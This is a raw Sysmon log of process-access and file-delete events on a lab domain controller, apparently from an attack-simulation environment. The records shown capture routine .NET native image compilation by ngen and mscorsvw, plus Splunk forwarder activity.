21:07:20.264{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-ED05-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.248{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-ED05-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.248{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-ED05-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.248{4DB9351A-A288-60D3-EC05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TZYDCAQQ6X\System.ServiceModel.ServiceMoniker40.ni.dll.auxMD5=EB0050A3E0707E0A177BDB58FCE5F330,SHA256=D0E6A63E41C1C4D0C2ABAF50ADADA04B0A3563BD028C57649CAAAE7B5FCEB480,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.248{4DB9351A-A288-60D3-EC05-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TZYDCAQQ6X\System.ServiceModel.ServiceMoniker40.ni.dllMD5=AAAC092D520BCCFEADC2FAB84331D94F,SHA256=6126D88064FD93C8444FBB42CCDEC3253FA59BE9B14658951C55FD26620428F2,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.233{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-EC05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.217{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-EC05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.217{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-EC05-00000000CF01}5960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.217{4DB9351A-A288-60D3-EB05-00000000CF01}6764NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DYLQMNQSVL\System.ServiceModel.Routing.ni.dll.auxMD5=D42D77AFA8B6A98049C6F67733C17800,SHA256=0A59BF3368081CFBBBC2D43086949F02247B0284C7B9B09717D4ADA07ABE3260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.217{4DB9351A-A288-60D3-EB05-00000000CF01}6764NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DYLQMNQSVL\System.ServiceModel.Routing.ni.dllMD5=95E3904774227F145DA30B6B8AC1970F,SHA256=8F7D24D77D2B2AA54A54DDCAD5363FAB618DF9B58434ECAAE4D86BD56B699149,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.201{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-EB05-00000000CF01}6764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.186{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-EB05-00000000CF01}6764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.186{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-EB05-00000000CF01}6764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.186{4DB9351A-A288-60D3-EA05-00000000CF01}6884NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BB9JVWQKGV\System.ServiceModel.Internals.ni.dll.auxMD5=0F0BD81CF136FA9F60648C8AB2221CEA,SHA256=933BDE8D9A8E527569756DFFF3D06D76857F23D7C8F091EFA466C6C10597E184,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.170{4DB9351A-A288-60D3-EA05-00000000CF01}6884NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BB9JVWQKGV\System.ServiceModel.Internals.ni.dllMD5=5D24E5D066D05CAD1F313C0D8E9F84FC,SHA256=E01D19F57723F2A20EDA3DCB9B6DE69A6E1C12FBD79C1F3506A3F133DD627A12,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.108{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-EA05-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.092{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-EA05-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.092{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-EA05-00000000CF01}6884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.092{4DB9351A-A288-60D3-E905-00000000CF01}852NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LE1L1Z9Q0P\System.ServiceModel.Discovery.ni.dll.auxMD5=9019205CDE1BDA7A7CBE8C379590678E,SHA256=72B9245A433469A1EE2A273944F26F936E0ECFA3D3276C41D563B4E9B8C41357,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.092{4DB9351A-A288-60D3-E905-00000000CF01}852NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LE1L1Z9Q0P\System.ServiceModel.Discovery.ni.dllMD5=FFA371BE1375A98300D59B38790ADEBE,SHA256=F218DD19FD96620E3378A627EE6BF64D46236DDB571793D334B9E2969F8134B1,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-E905-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.014{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA998B3B359FCEC0B9927B3D65DD4C74,SHA256=9C5342C3409C1B8816B2CEB0351EC8136492B487FCCE93C017D5E4EEAC0C0078,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.998{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-E905-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.998{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-E905-00000000CF01}852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.998{4DB9351A-A287-60D3-E805-00000000CF01}6228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2HY8FXGBBJ\System.ServiceModel.Channels.ni.dll.auxMD5=DCED632E66C4D799A94BEBAD939226DA,SHA256=8D8E04992F318C42501098DD7BE0F6DC178F4CFDD862F88FB89B64893CEFF722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.998{4DB9351A-A287-60D3-E805-00000000CF01}6228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2HY8FXGBBJ\System.ServiceModel.Channels.ni.dllMD5=6BFA0D7D6BB164DA9A776DCADB96E235,SHA256=97F15EFF7DAB6ECD25130FDC10F2A84C69BC67E12DB5494C1491D6EAFE0869AD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A289-60D3-FC05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.686{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A289-60D3-FC05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.686{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A289-60D3-FC05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:21.670{4DB9351A-A289-60D3-FB05-00000000CF01}2932NT 